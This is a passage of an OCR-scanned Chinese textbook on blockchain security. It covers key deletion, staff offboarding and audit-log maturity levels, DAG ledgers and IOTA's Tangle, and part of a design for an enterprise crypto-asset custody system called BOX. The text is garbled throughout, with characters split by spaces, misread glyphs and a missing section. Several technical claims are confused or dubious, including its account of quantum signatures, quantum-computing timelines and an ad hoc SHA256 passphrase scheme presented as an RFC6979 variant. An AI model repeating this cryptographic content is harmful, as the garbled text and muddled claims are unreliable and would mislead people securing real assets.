@@ 多 重 签名 钱包 的 任意 两 个 主 密 钥 或 密 钥 种 子 都 不 能 出 现在 同一 台 设 备 中 。 将 同一 钱包 的 两 个 密 铀 放 在 同一 个 设备 上 ， 可 能 会 被 恶意 人 员 或 恶意 软件 泄漏。 
7 密 钥 销 毁 
计算 机 系统 中 的 数据 被 删除 后 ， 使 用 数字 取证 技术 仍然 可 能 将 其 读 取出 来 。 所 以 需要 正确 地 删除 密 铀 ， 以 便 减 少 信息 从 服务 器 、 硬 盘 、 移 动 存储 等 设备 上 的 泄漏 
(1) 级 别 | 
密 钥 管理 员 应 该 知道 密 铀 从 服务 器 、 硬 盘 、 移 动 存储 等 设备 上 删除 后 ， 数 据 信息 其 实 仍然 存在 。 密 钥 管 理 员 需 要 使 用 专用 工具 来 永久 地 出 除 密 钥 。 
(2) 级 别 1 


存在 一 套 详细 的 规章 制度 来 规范 密 钥 的 清除 ， 文 档 中 摘 述 了 清除 密 钥 需要 使 用 的 方法 和 工具 。 


员工 入 职 和 离职 时 管理 不 当 会 造成 离职 后 仍然 持 有 特殊 权限 ， 甚 至 仍然 持 有 未 撤销 的 密 铀 ， 可 以 用 于 签署 交易 。 
(1) 级 别 | 


在 机 构 里 必须 重视 密 钥 管 理 者 入 职 和 离职 时 的 角色 管理 ， 需 要 维护 一 些 清 单 ， 履 盖 密 钥 管 理 者 入 职 和 离职 时 需要 完成 的 所 有 任务 ; 而 且 这 些 清单 已 经 被 知识 渊博 的 人 员 审 查 ， 以 确保 密 钥 管理 者 获得 
的 权限 没有 超过 他 应 有 的 权限 。 


(2) 级 别 1 
@ 所 有 密 钥 管 理 员 的 授权 /撤销 请 求 均 通过 已 认证 的 可 信 通 道 进行 。 
@ 清 单 记录 了 执行 授权 /撤销 操作 的 工作 人 员 身 份 的 审计 信息 ， 每 个 审计 条 目 都 能 由 执行 任务 的 工作 人 员 提 供 证 明 。 
9. 审 计 日 志 


审计 日 志 需 要 记录 系统 中 所 有 的 信息 变化 。 在 发 生意 外 或 安全 事件 的 情况 下 ， 审 计 日 志 是 非常 有 价值 的 工具 ， 可 帮助 调查 人 员 了 解 意外 情况 发 生 的 原因 以 及 寻找 解决 方法 。 审 计 日 志 的 维护 大 大 降低 
了 运 维 的 风险 ， 提 高 了 系统 纠正 错误 的 能 力 。 


(1) 级 别 | 

在 信息 系统 中 执行 的 操作 子 集 存 在 审计 条 目 ， 比 如 记录 了 所 有 的 提 款 和 存款 信息 。 

(2) 级 别 1 

所 有 用 户 的 所 有 操作 都 被 记录 。 这 些 记录 为 调查 系统 的 意外 行为 提供 了 重要 的 帮助 ， 可 以 帮助 识别 恶意 行为 。 


审计 日 志 被 定期 备份 到 一 个 独立 的 服务 器 。 这 样 可 以 保存 有 价值 的 信息 ， 以 免 审计 日 志 被 修改 或 破坏 。 


A.9 本章 小 结 


本 附录 系统 介绍 了 主要 的 加 密 算法 、 隐 私 保护 算法 、 签 名 算法 、 安 全 分 析 方 法 论 等 ， 使 读者 可 以 对 区 块 链 安全 技术 有 一 个 初步 的 认识 。 区 块 链 是 一 种 通过 去 中 心 化 、 去 信任 的 方式 集体 维护 的 可 靠 数 
据 库 的 技术 方案 ， 从 安全 性 分 析 的 角度 ， 区 块 链 必然 面临 着 算法 安全 性 、 协 议 安全 性 、 使 用 安全 性 、 实 现 安全 性 和 系统 安全 性 的 挑战 。 面 对 这 一 系列 的 挑战 ， 应 考虑 综合 运用 信息 安全 技术 来 提升 区 块 链 
系统 的 健壮 性 和 抵御 攻击 的 能 力 ， 这 才 是 区 块 链 安全 技术 应 用 的 重心 。 
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附录 B ”区 块 链 的 DAG 技 术 和 安全 分 析 


为 了 让 读者 更 好 地 理解 DAG 及 其 试图 解决 的 问题 ， 这 里 首先 介绍 区 块 链 的 局 限 性 。 了 解 这 些 限制 ， 将 有 助 于 我 们 理解 Tangle。 
(1) 不 必要 集中 


随 着 区 块 链 或 所 谓 的 分 类 账本 不 断 发 展 壮大 ， 更 小 的 节点 将 无 法 存储 分 类 账本 的 完整 副本 ， 从 而 只 留 下 能 够 存储 完整 分 类 账本 的 大 型 采矿 场 。 如 果 只 有 较 大 的 节点 运行 区 块 链 ， 那 么 这 也 是 一 种 集中 
形式 。 正 如 我 们 从 许多 加 密 货币 社区 所 看 到 的 ， 小 规模 的 少数 群体 聚集 在 一 起 形成 了 大 群体 ， 并 减少 了 挖 矿 奖励 的 变量 ， 从 而 导致 权利 的 集中 。 而 该 权利 可 从 政治 上 和 计算 上 来 看 ， 这 些 群 体 可 能 会 小 
其 权利 来 推迟 交易 ， 首 先 挖掘 其 自己 的 交易 ， 或 者 过 滤 某 些 交 易 。 


比特 币 的 交易 费用 已 经 在 上 涨 。 对 于 低 于 100 美 元 的 交易 来 说， 比特 币 的 交易 费用 非常 昂贵 。 一 位 激动 的 投资 者 曾 投入 了 2220 美 元 的 交易 费 ， 以 确保 他 在 BAT ICO 的 投资 。 而 包含 低 费 用 的 交易 甚至 
可 能 需要 长 达 几 天 的 时 间 才 能 得 到 确认 。 


(3) 区 块 链 的 可 扩展 性 


本 书写 作 时 ， 比 特 币 网 络 正面 临 超过 156000 项 未 确认 交易 的 积压 (读者 可 以 在 blockchain.info 中 查看 正 推送 到 积压 的 所 有 交易 的 实时 流 ) 。 与 此 同时 ， 其 他 区 块 链 则 面临 着 更 严重 的 可 扩展 性 问题 。 
在 可 扩展 性 方面 ， 以 太 坊 网 络 多 次 成 为 业界 关注 的 焦点 。2017 年 12 月 10 日 ， 一 个 出 售 可 以 培育 和 收集 的 虚拟 猫 的 ICO 让 以 太 坊 网 络 拥挤 不 堪 其 CryptoKitties 交 易 几 乎 占 到 以 太 坊 网 络 交易 总 量 的 15%。 被 
拖 办 的 以 太 坊 网 络 ， 意 味 着 在 分 布 式 架构 上 运行 的 所 有 应 用 程序 的 交易 时 间 都 变 得 更 慢 。 由 于 潜在 问题 是 一 种 低 效 的 共识 算法 ， 因 此 执行 这 些 转 移 操作 所 需 的 成 本 和 时 间 出 现 了 增加 并 失控 。 


B.1 基于 DAG 的 区 块 链 


B.1.1 什么 是 DAG 技 术 


在 数学 和 计算 机 科学 领域 ， 图 和 树 一 样 ， 是 一 种 数据 结构 。 在 计算 机 科学 中 ,为 了 避免 复杂 的 数据 结构 影响 开发 和 数学 建 模 ， 往 往 会 将 结构 进行 简化 或 约束 。 在 图 论 中 ， 结 构 就 被 简化 ， 分 为 有 向 图 
和 无 向 图 两 大 类 ; 在 无 向 图 中 进一步 进行 约束 ， 形 成 了 DAG。 DAG 是 一 种 无 有 向 环 的 有 限 有 向 图 。 也 就 是 说 ， 它 由 有 限 的 多 个 顶点 和 边 组 成 ， 每 条 边 从 一 个 顶点 指向 另 一 个 顶点 ， 因 此 无 法 在 任何 顶点 v 
处 开始 ， 遵 循 一 个 始终 有 向 的 边 的 序列 ， 最 后 循环 回 v。 同 样 ，DAG 是 一 种 有 向 图 ( 见 图 B-1) ， 存 在 拓扑 排序 一 一 一 个 顶点 序列 ， 使 得 每 条 边 从 该 序列 中 的 较 早 指向 较 晚 且 不 存在 环 路 ， 由 于 网 络 具有 序 


列 性 ， 新 区 块 的 产生 就 会 在 网 络 的 最 末端 。 
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图 B-1 DAG 拓 扑 网 络 模型 和 新 区 块 的 产生 


B.1.2 ”区 块 链 DAG 


由 于 PoW 系 统 原因 ， 对 于 比特 币 或 以 太 坊 ， 区 块 的 创建 速度 是 一 个 瓶颈 。 区 块 不 能 同时 创建 ， 已 链接 的 存储 结构 只 允许 整个 网 络 上 人 存在 一 条 链 。 大 约 同时 发 生 的 所 有 交易 均 保 存在 同一 个 区 块 中 ， 然 
后 由 矿工 们 来 争夺 区 块 验证 。 比 特 币 每 10 分 钟 产生 一 个 新 区 块 ， 以 太 坊 则 稍微 快 一 些 , 但 它 需要 大 约 15 ~ 20 秒 的 时 间 来 进行 区 块 验证 。 然 而 我 们 为 什么 非 要 一 个 区 块 呢 ? 在 比特 币 网 络 上 ， 许 多 交易 被 挖 
气 成 了 区 块 ， 交 易 序列 通过 区 块 之 间 的 预 散 列 来 维持 。 如 果 将 区 块 和 交易 组 合 在 一 起 ， 会 怎么 样 ? 让 每 笔 交 易 直 接 参与 序列 的 维护 。 交 易 完成 后 ， 可 以 跳 过 控 矿 过 程 。 为 了 解决 比特 币 效 率 低 、 区 块 无 法 
并 行 执行 (整个 网 络 中 同时 只 能 有 一 条 链 ， 所 以 导致 无 法 并 行 ) 等 问题 ，Nxt 社 区 提出 了 把 无 区 块 结构 的 DAG 用 于 解决 区 块 链 的 效率 问题 。 区 块 链 与 DAG 的 组 合 仍 然 来 自 侧 链 的 想法 一 一 不 同类 型 的 交易 
在 不 同 的 链 上 同时 运行 ， 所 以 区 块 的 DAG 仍 然 依赖 于 区 块 的 概念 。DAG 的 解决 方法 是 ， 将 最 长 链 共识 改 成 最 重 链 共识 。 每 个 挖 出 来 的 区 块 ， 不 仅仅 连 在 之 前 的 一 个 区 块 上 ， 而 是 连接 到 之 前 的 所 有 区 块 
上 。 图 B-2 所 示 是 无 区 块 结构 的 DAG。 








图 B-2 无 区 块 结构 的 DAG 


B.1.3 DAG 区 块 链 的 特性 
为 了 帮助 读者 更 好 地 了 解 DAG 在 区 块 链 中 的 特性 ， 下 面 将 从 5 个 方面 来 介绍 。 
(1) 概率 论 角度 的 双重 消耗 问题 
比特 币 网 络 使 用 UTXO (未 耗 尽 的 交易 输出 ) 模型 ， 用 户 只 能 在 其 UTXO 下 完成 一 次 交易 。 同 一 时 间 可 能 有 多 个 矿工 解决 散 列 函数 ， 以 获取 区 块 验证 权 。 这 可 能 会 临时 产生 分 又 。 某 笔 特定 交 易 的 验证 
取决 于 其 后 面 的 交易 数量 ， 返 回 到 网 络 的 交易 比率 较 低 ， 背 后 的 交易 更 多 ， 使 得 交易 更 加 安全 。 
(2) 网 络 的 宽度 
当 每 笔 交 易 均 要 进行 验证 时 ， 需 要 将 其 链接 到 DAG 网 络 上 一 笔 现 有 的 相对 较 新 的 交易 。 如 果 其 每 次 链接 到 较 早 的 交易 ， 那 么 将 使 网 络 过 宽 ， 而 无 法 验证 新 的 交易 。 理 想 情 况 下 ， 当 发 生 新 交易 
时 ，DAG 网 络 会 选择 一 笔 现 有 的 较 晚 交易 来 链接 。 其 目标 是 将 网 络 带 宽 保 持 在 一 定 范围 内 ， 以 便 快速 验证 交易 。 在 这 方面 ，IOTA 还 提出 了 其 自身 的 控制 缠 结 网 络 带 宽 的 算法 ， 后 文 会 介绍 。 
(3) 快速 交易 
由 于 其 具有 无 区 块 性 ， 因 此 交易 可 直接 进入 DAG 网 络 。 整 个 过 程 比 基 于 PoW 和 PoS 的 区 块 链 要 快 得 多 。 
(4) 不 涉及 挖 矿 
DAG 网 络 上 没有 矿工 ， 交 易 的 验证 直接 交 给 交易 本 身 。 对 于 用 户 来 说 ， 这 意味 着 交易 几乎 是 即时 完成 的 。 
(5) 方便 小 额 付 款 


随 着 DAG 的 进步 ， 我 们 正 着 眼 于 一 种 可 实现 高 功能 和 最 低 交 易 费 用 的 链 的 未 来 。 这 意味 着 用 户 可 以 在 无 须 比 特 币 或 以 太 坊 等 沉重 费用 的 情况 下 进行 小 额 支付 。DAG 将 用 于 那些 需要 在 每 秒 数 干 次 交易 
中 实现 可 扩展 性 的 应 用 程序 。CryptoKitties 的 推出 阻塞 了 以 太 坊 网 络 ， 导 致 交 易 缓 慢 ， 且 收费 高 昂 。 对 此 以 太 坊 中 有 一 个 称 为 分 区 的 解决 方案 ， 但 该 解决 方案 落后 了 5 年 。 笔 者 认为 应 用 程序 很 快 会 按 比例 
转向 DAG。 


除了 交易 信息 之 外 ，DAG 链 单元 还 包括 创建 该 单元 的 一 个 或 多 个 用 户 的 签名 以 及 对 由 其 散 列 标识 的 一 个 或 多 个 先前 单元 〈 母 单元 ) 的 引用 。 单 元 彼此 链接 ， 使 得 每 个 单元 包含 一 个 或 多 个 较 早 单元 的 
散 列 。 这 既 可 用 于 确认 较 早 的 单元 ， 也 可 用 于 确定 其 部 分 顺序 。 单 元 之 间 的 链 集 形成 一 个 DAG。 不 会 存在 一 个 单一 的 中 央 实 体 来 管理 或 协调 新 单元 进入 到 数据 库 中 ， 每 个 人 都 可 以 添加 一 个 新 的 单元 ， 只 
要 其 签字 ， 并 支付 一 笔 与 添加 的 数据 大 小 (以 字 节 为 单位 ) 相应 的 费用 。 该 费用 由 其 他 用 户 收取 ， 后 者 随后 通过 将 其 散 列 包含 在 自己 的 单元 中 来 确认 新 添加 的 单元 。 随 着 新 单元 的 添加 ， 每 个 较 早 的 单元 
将 会 直接 或 间接 地 获得 越 来 越 多 的 来 自 包含 其 散 列 的 较 晚 单元 的 确认 。 在 区 块 链 中 ， 区 块 的 发 布 是 一 种 罕见 事件 ， 实 际 上 只 有 特权 级 别 的 用 户 参与 该 活动 。 与 区 块 链 不 同 ， 新 的 DAG 链 单元 在 发 布 后 立即 
开始 累积 确认 ， 该 确认 可 以 来 自任 何人 ， 且 每 当 发 布 另 一 个 新 单元 时 便 可 收 到 。 换 句 话说 ， 不 存在 普通 用 户 和 矿工 的 双 层 体系 ; 相反 ， 用 户 可 以 互相 帮助 一 通过 添加 新 的 单元 ， 其 创造 者 还 将 确认 所 有 
以 前 的 单元 。 对 母 单元 的 引用 是 确定 单元 顺序 (目前 只 有 部 分 顺序 ) 和 推广 区 块 链 结构 的 要 素 。 由 于 我 们 并 不 局 限于 连续 区 块 之 间 的 一 母 一 子 关系 ， 因 此 不 必 争 取 接 近 同 步 ， 可 以 安全 地 容忍 大 幅度 延迟 
和 高 吞吐 量 。 





B.2 ”DAG 区 块 链 与 安全 : IOTA 


为 了 帮助 读者 进一步 了 解 DAG 给 区 块 链 的 安全 方面 所 带 来 的 新 启示 与 影响 ， 下 面 以 IOTA 例 来 讲解 。IOTA 的 全 称 为 MIOTA， 是 于 2014 年 开始 众 筹 的 一 个 项 目 ， 正 式 发 行 于 2015 年 11 月 ， 其 主要 关注 
领域 是 物 联网 (Internet-of-Things) 。IOTA 基 本 上 是 为 物 联 网 而 生 的 技术 ， 因 为 这 项 互通 性 技术 能 够 实现 数据 真实 性 ， 并 用 于 工业 用 具 。 另 外 ，1OTA 可 以 通过 各 种 传感器 设备 实时 采集 任何 物体 或 过 程 
需要 监控 、 连 接 、 互 动 的 各 种 所 需要 信息 ， 与 互联 网 结合 形成 一 个 巨大 网 络 ， 还 能 与 智慧 城市 和 自 适 应 系统 中 的 各 种 设备 通信 。 其 最 终 目 的 是 实现 万 物 互联 ， 方 便 识 别 、 管 理 和 控制 ( 见 图 B-3) 。 简 而 言 
之 ,1OTA 可 谓 是 物 联 网 的 支柱 。 

10TA 是 为 物 联网 设计 的 一 个 革命 性 的 物 联网 事务 处 理 和 数据 传输 层 。 其 设计 思想 是 基于 新 的 分 布 式 账本 一 一 Tangle， 而 Tangle 网 络 所 使 用 的 技术 就 是 DAG。 它 克服 了 当前 区 块 链 设 计 的 低 效 性 ,也 
有 效 地 避 开 了 区 块 链 设 计 的 首 端 一 一 引入 了 在 分 散 式 对 等 系统 中 达成 共识 的 新 方法 。 有 史 以 来 第 一 次 ,通过 |OTA， 人 们 可 以 不 付 任何 费用 地 转账 。 这 意味 着 甚至 可 以 通过 |OTA 进 行 无 限 小 的 纳 期 支付 。 
总 之 ，IOTA 为 物 联 网 提供 了 “ 零 交 易 费 用 ”“ 无 线 扩展 ” “离线 交易 ”的 数字 交易 市 场 环境 。 
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图 B-3” 物 联网 结构 


Tangle ( 缠 结 ， 也 称 DAG) ， 是 区 块 链 的 一 种 新 方法 。 区 块 链 技术 告诉 我 们 ， 挖 矿 可 能 并 非 理 想 的 解决 方案 ， 特 别 是 当 解 决 可 扩展 性 问题 时 。 缠 结 没有 挖 矿 操作 ,没有 区 块 ， 也 没有 交易 费用 。 矿 工 
和 验证 人 之 间 不 划分 网 络 的 安全 性 和 共识 。 缠 结 已 经 找到 了 解决 不 必要 集中 问题 的 方法 。 网 络 用 户 必 须 通 过 工作 证 明 或 其 他 工具 来 验证 两 笔 上 日 交易 ， 以 便 能 够 进行 一 笔 自己 的 交易 。 用 户 不 会 收 到 奖励 ， 
或 者 不 必 非 得 文 付 交 易 费用 。 基 本 上 ， 用 户 就 是 矿工 。 这 是 有 利 的 ， 因 为 其 无 法 形成 大 型 挖 矿 群 体 ， 避 免 了 矿工 和 网 络 用 户 之 间 的 矛盾 。 缠 结 没有 采用 互相 链接 形成 庞大 区 块 的 原则 ; 相反 ， 它 会 构建 一 
个 引用 旧 交 易 的 交易 图 ， 因 此 可 以 在 某 个 节点 收 到 交易 时 立即 确认 该 交易 ， 而 不 必 等 待 下 一 个 区 块 。 理 论 上 ， 其 可 以 对 交易 进行 并 行 验证 。 


Tangle 可 能 的 局 限 : 由 于 其 具有 图 形 结构 ， 因 此 Tangle 能 够 快速 确认 交易 。 然 而 ， 类 似 OTA 和 Byteball 这 样 的 加 密 项 目 中 的 现 有 工具 会 遇 到 同步 问题 。 同 步 节点 之 间 的 状态 似乎 是 现 有 缠 结 工具 的 主 
要 问题 。1OTA 目 前 依赖 于 一 个 单独 的 协调 者 节点 ，Byteball 依 赖 于 12 个 目击 者 节点 ， 而 这 些 节点 均 由 开发 商 自 己 控制 。 由 于 存在 单 点 故障 和 人 为 干预 ， 因 此 两 者 均 不 理想 。 


DAG 区 块 链 结构 非常 适合 高 并 发 且 小 数据 交易 的 loT 场 景 ， 下 面 以 IOTA 为 例 介绍 其 创新 点 。 
(1) 共识 机 制 创 新 


区 块 链 共识 具有 非常 严格 的 机 制 。 在 区 块 链 中 要 添加 一 个 新 的 区 块 ， 需 要 进行 多 方 竞争 以 获取 区 块 的 奖励 或 交易 手续 费 ， 而 且 在 区 块 链 中 共识 和 交易 生成 是 分 开 的 ， 仅 由 网 络 上 的 一 小 部 分 人 完成 。 
正 因 如 此 ， 通 常设 置 更 高 的 阅 值 (如 比特 币 ) ， 这 将 导致 进一步 的 中 心 化 。 


在 IOTA 系 统 中 ， 不 再 有 区 块 的 概念 ， 网 络 共识 的 最 小 单位 就 是 交易 ， 网 络 中 每 个 参与 者 都 可 以 直接 确定 主 交 易 和 分 值 交易 ， 且 间接 在 子 Tangle 中 定位 其 他 交易 。 通 过 这 种 方式 ， 验 证 就 能 同步 进行 ， 
网 络 能 够 保持 完全 去 中 心 化 ， 不 需要 矿工 传递 信任 ， 也 不 需要 支付 交易 手续 费 。 


(2) 抗 量子 


IOTA 能 够 实现 量子 安全 ， 是 因为 采用 了 Winternitz One-Time Signature (W-OTS) 后 量子 签名 算法 。 量 子 签名 是 基于 量子 一 次 一 密 和 量子 密 钥 分 配 协议 ， 利 用 哈 希 函数 (Hash) 对 经 典 消息 取 摘 
要 ， 将 任意 位 的 经 典 消息 编码 为 确定 位 数 的 量子 信息 。 在 对 位 数 较 多 的 经 典 消息 签名 时 ， 大 大 减少 了 运算 量 ， 有 利于 物 联 网 设备 使 用 。 有 了 量子 签名 算法 ， 就 可 以 防止 量子 计算 机 攻击 一 一 量子 计算 机 的 
算 能 力 是 普通 矿 机 的 170 亿 倍 。 也 就 是 说 ， 现 行 的 比特 币 工 作 量 证 明 机 制 必须 得 想 办 法 避免 被 量子 计算 机 攻击 ， 人 否则 未 来 比特 币 就 面临 被 攻击 的 风险 。W-OTSs 算 法 的 本 质 就 是 “一 次 性 ”， 当 签 过 一 次 
名 后 就 不 能 重复 使 用 ， 需 要 重新 更 换 新 地 址 。 但 是 W-OTs 也 存在 一 个 明显 的 缺点 ， 就 是 签名 长 度 特别 差 ， 这 也 是 抗 量子 签名 普遍 的 缺点 。IOTA 的 单 笔 交 易 编码 后 有 2673trytes (大 约 为 281.96 bytes) ， 
但 签名 占 了 81% (2187 trytes) 。 对 于 物 联 网 设备 来 说 ， 这 可 能 是 一 个 很 大 的 挑战 。 然 而 ， 世 界 第 一 批量 子 计算 机 其 实 大 概要 到 2023 年 才 会 问世 ， 所 以 Tangle 这 个 特色 只 能 防 患 于 未 然 ， 对 于 目前 来 说 还 
没什么 真正 用 途 。 


(3) 三 元 逻辑 

二 进 制 是 计算 技术 中 广泛 采用 的 一 种 数 制 ， 二 进 制 数据 是 用 0 和 1 两 个 数码 来 表示 。 而 在 IOTA 网 络 中 却 采 用 了 三 进 制 (Trit) ， 三 进 制 数据 是 用 -1、0 和 1 三 个 数码 来 表示 。Trit 类 似 于 计算 技术 中 的 
bit (位 ) ， 而 Tryte 类 似 于 byte ( 字 节 ) ，1tryte=3trit。 在 IOTA 的 发 展 路 线 中 我 们 了 解 到 ，IOTA “Curl 哈 希 函 数 ”的 硬件 部 署 了 哈 希 计算 器 。Cur| 就 是 一 种 三 进 制 算 法 ， 它 是 由 SHA-3 标 准 的 单 向 散 列 函 
数 算法 的 友 了 明 者 Keccak 设 计 的 。1IOTA 采 用 Curl 哈 希 国 数 ， 而 不 是 椭圆 曲线 密码 学 (ECC) 。Curl 哈 希 函 数 不 仅 仅 在 速度 上 胜 过 了 ECC， 还 能 大 大 简化 整个 协议 (签名 和 验证 ) 。 三 元 逻辑 的 好 处 是 在 某 些 
情况 下 性 能 表现 更 优 ， 不 足 的 地 方 是 很 不 容易 找到 三 元 逻辑 的 处 理 器 。IOTA 团 队 正在 研 帮 IloT 异 步 三 态 处 理 器 JNN， 因 为 三 进 制 架 构 的 电路 功 耗 低 ， 适 合集 成 到 loT 设 备 中 。 


3.DAG 高 效 性 与 安全 性 


区 块 链 系 统 是 线性 的 、 连 续 的 同步 链 式 系统 ， 系 统 只 有 在 上 一 个 区 块 被 挖 出 来 并 添加 到 区 块 链 上 之 后 才能 开始 去 挖 下 一 个 区 块 ; 而 Tangle 系 统 是 基于 DAG 的 异步 系统 ( 见 图 B-4) ， 对 于 交易 的 验证 
可 以 平行 进行 ， 大 大 提高 了 系统 的 吞吐 量 。 通 过 DAG，1OTA 能 够 实现 较 高 的 交易 吞吐 量 (通过 平行 验证 ) ， 并 且 不 收取 交易 手续 费 。 与 如 今 的 区 块 链 不 同 的 是 ， 共 识 是 与 系统 挂 勾 的 ， 是 系统 固有 的 一 部 
分 ， 这 样 就 能 打造 出 一 种 完全 去 中 心 化 和 能 够 实现 自我 管理 的 P2P 网 络 。 





图 B-4 Tangle 网 络 


Tangle 采 用 Ternary 进 行 编码 ， 比 通常 的 Binary 代 码 效率 更 高 。 在 Tangle 中 ， 每 个 节点 都 代表 着 一 笔 交 易 。 因 为 其 特殊 的 验证 交易 方式 ， 在 验证 速度 上 也 比 普 通 的 区 块 链 快 得 多 ， 可 以 近 平 即时 完成 
每 笔 交易 ， 而 不 需要 像 我 们 发 出 比特 币 交 易 得 付 足 够 的 交易 手续 费 才 能 在 几 分 钟 之 内 完成 验证 。 另 外 ， 因 为 Tangle 的 交易 发 起 者 同时 也 是 交易 验证 者 的 关系 ， 可 以 避免 目前 交易 验证 者 (矿工 ) 过度 集中 
于 某 一 区 域 (如 中 国 ) 与 去 中 心 化 背道而驰 的 问题 。Tangle 可 以 比 区 块 链 更 接近 去 中 心 化 的 目标 。 此 外 ， 随 着 Tangle 的 不 断 发展 ， 越 来 越 多 的 参与 者 都 将 发 起 交易 ， 整 个 系统 也 会 变 得 越 来 越 安全 和 快 
速 ， 确 认 时 间 会 缩短 ， 交 易 也 完成 的 越 来 越 快 。 


附录 C ”企业 级 数字 资产 保护 


随 着 数字 资产 市 场 规模 的 不 断 扩大 ， 越 来 越 多 的 投资 机 构 、 企 业 、 创 业 团队 进入 到 这 个 领域 ， 其 所 持 有 的 各 类 数字 资产 规模 也 在 快速 增长 。 但 是 目前 针对 企业 的 数字 资产 管理 工具 极度 荐 乏 ， 不 时 传 
出 的 个 人 钱包 被 盗 、 私 钥 丢 失 、 交 易 平 台 钱 包 被 盗 等 负面 新 闻 ， 更 是 加 剧 了 企业 对 数字 资产 安全 、 便 捷 等 问题 的 担忧 。 这 些 问题 已 经 严重 影响 到 企业 用 户 对 数字 资产 的 投资 和 管理 。 


在 过 去 的 几 年 中 ， 区 块 链 领 域 的 个 别 团 队 也 曾 尝 试 过 或 正在 尝试 利用 各 种 技术 增强 钱包 的 安全 性 ,但 是 由 于 种 种 原因 ， 至 今 没有 一 个 通用 的 、 成 本 较 低 的 、 方 便 部 署 使 用 的 解决 方案 公开 发 布 。 


通过 多 年 的 实际 体验 以 及 大 量 走访 ， 我 们 了 解 到 行业 内 有 如 下 需求 。 


` 多 人 共管 最 高 管理 权限 ， 使 得 数字 资产 归属 于 企业 ， 而 不 是 个 人 。 
. 企业 可 以 拥有 对 外 的 统一 收 款 地 址 ， 即 数字 资产 对 公 账 户 。 

" 允许 设 定 企业 财务 审批 流程 ， 降 低 人 为 操作 失误 的 可 能 。 

` 在 任何 情况 下 ， 私 钥 均 不 能 以 明文 形式 暴露 。 

` 不 可 伪造 转账 指令 盗 取 资产 。 

` 方便 企业 将 数字 资产 入 账 及 审计 。 


* 私 钥 持 有 人 一 旦 发 生意 外 事故 导致 不 能 行使 权力 ， 企 业 资产 不 能 丢失 。 


C.1 ”BOX 设计 思想 
BOX 是 一 套 企业 自主 拥有 的 数字 资产 银行 系统 ， 其 设计 思想 如 图 C-1 所 示 。 
` 通过 该 系统 可 将 企业 所 拥有 的 各 类 数字 资产 钱包 进行 一 站 式 集中 管理 。 
` 通过 将 私 钥 加 密 运 行 在 内 存 中 的 方式 让 其 永 不 暴露 。 
: 通过 企业 自主 拥有 的 私有 区 块 链 网 络 保证 操作 指令 和 资产 数据 的 存 证 和 验 真 。 
' 通过 顺序 性 私 钥 签 名 方式 构建 企业 订 制 化 资产 管理 业务 流 。 


通过 SSL/TLS 加 密 保 证 通信 通道 的 绝对 安全 。 


" BOX 从 原理 上 做 到 了 防范 外 部 黑客 、 内 部 黑客 、 单 人 误 操 作 等 当前 个 人 钱包 普遍 存在 的 漏洞 ; 同时 ， 它 还 具有 入 侵 锁 死 、 系 统 重 置 等 安全 机 制 ， 以 此 保证 企业 数字 资产 的 高 安全 性 。 
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在 BOX 架 构 中 ， 私 链 节 点 数量 为 2n+1 (n>1) ; 私 钥 App 数 量 最 少 为 3 个 ， 具 体 数 量 由 各 企业 内 部 自主 定制 ;应 用 服务 器 为 云端 服务 器 ， 不 会 与 签名 机 有 任何 通信 ;签名 机 是 一 台独 立 的 物理 服务 
器 ， 仪 能 与 私 链 通信 ， 仪 有 签名 机 才能 向 热钱 包 友 出 转账 指令 ; 员工 App 为 转账 指令 上 发 起 方 ; 管理 App 执 行 审批 ， 如 图 C-2 所 示 。 
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图 C-2 BOX 架构 与 执行 流程 


BOX 系 统 可 以 接 入 所 有 支持 离线 签名 的 数字 货币 。 首 次 发 行 版 将 接 入 以 太 坊 及 ER-C20 代 币 ; 在 未 来 的 版 本 中 ， 将 陆续 接 入 其 他 币 种 。 


C2 ” 私 钥 安 全 机 制 


(1) 私 钥 的 存储 
私 钥 存储 在 签名 机 的 内 存 中 ， 不 会 做 持久 化 存储 。 在 极端 情况 签名 机 被 入 侵 之 后 ， 入 侵 者 也 很 难 在 短 时 间 内 寻找 到 私 钥 ， 大 大 降低 了 私 钥 暴露 的 风险 。 


签名 机 是 一 台独 立 存放 的 服务 器 ， 建 议 存放 在 安全 级 别 非常 高 的 地 点 ， 例 如 金融 级 机 房 、 企 业 自 己 控制 的 高 安全 性 机 房 、 某 个 私密 地 点 。 该 签名 机 需要 有 24 小 时 不 间断 供电 和 网 络 接 入 及 固定 IP 地 
址 ， 不 能 轻易 地 被 任何 人 接近 和 操作 ， 包 括 企业 的 IT 主管 人 员 。 


企业 的 数字 资产 实际 存储 在 各 个 数字 货币 公 链 ( 即 “ 热 钱包 ”) 上 ， 如 果 该 数字 货币 的 官方 钱包 支持 离线 签名 ， 则 私 钥 可 以 被 存储 在 签名 机 的 内 存 中 ， 通 过 离线 签名 实现 在 不 暴露 私 钥 的 前 提 下 ， 完 
成 确 权 并 转账 。 


(2) 私 钥 的 生成 


为 了 防止 私 钥 的 生成 被 模拟 ， 我 们 及 用 RFC6979 协 议 的 变形 形式 : k=SHA256(d+SHA256(m1)+SHA256(m2)+SHA256(m3)+.….)。 其 中 ，d 为 服务 器 随机 数 ，m 为 私 钥 App 输 入 的 关键 句 。 私 钥 通 过 
由 3 个 或 多 个 私 铀 App 分 别 输入 关键 句 的 方式 生成 ， 关 键 句 是 由 任意 的 字母 和 数字 组 合 而 成 的 字符 串 。3 个 或 多 个 私 铀 App 依 次 输入 关键 句 后 ， 由 3 条 关键 句 生成 的 私 钥 即 被 存放 在 签名 机 的 内 存 中 ， 同 时 由 
此 私 钥 生 成 的 公 钥 地 址 将 被 注册 在 公 链 上 ， 即 生成 公 链 (热钱 包 ) 。 私 铀 App 不 会 存储 该 天 键 句 ， 该 私 铀 App 的 源 代 码 也 将 同步 开源 。 


私 钥 App 的 所 有 传输 过 程 都 需要 双向 认证 。 私 铀 App 的 授权 方式 为 限制 分 帮 ， 即 服务 器 分 发 的 证 书 只 有 N 个 (NN 为 私 钥 App 的 个 数 ) ， 并 且 会 将 证 书 与 其 设备 1D 绑 定 ， 其 他 的 连接 请 求 都 会 被 拒绝 。 


如 果 私 铀 App 丢 失 ， 因 为 App 里 并 不 记录 任何 关键 句 和 密码 ， 所 以 没有 安全 风险 。 拥 有 关键 句 的 控制 人 可 以 重新 安装 私 铀 App， 并 使 用 原 关 键 句 重新 获取 服务 器 证 书 ， 然 后 签名 机 重新 绑 定 新 的 私 钥 
App 的 设备 1D。 


(3) 私 钥 的 恢复 
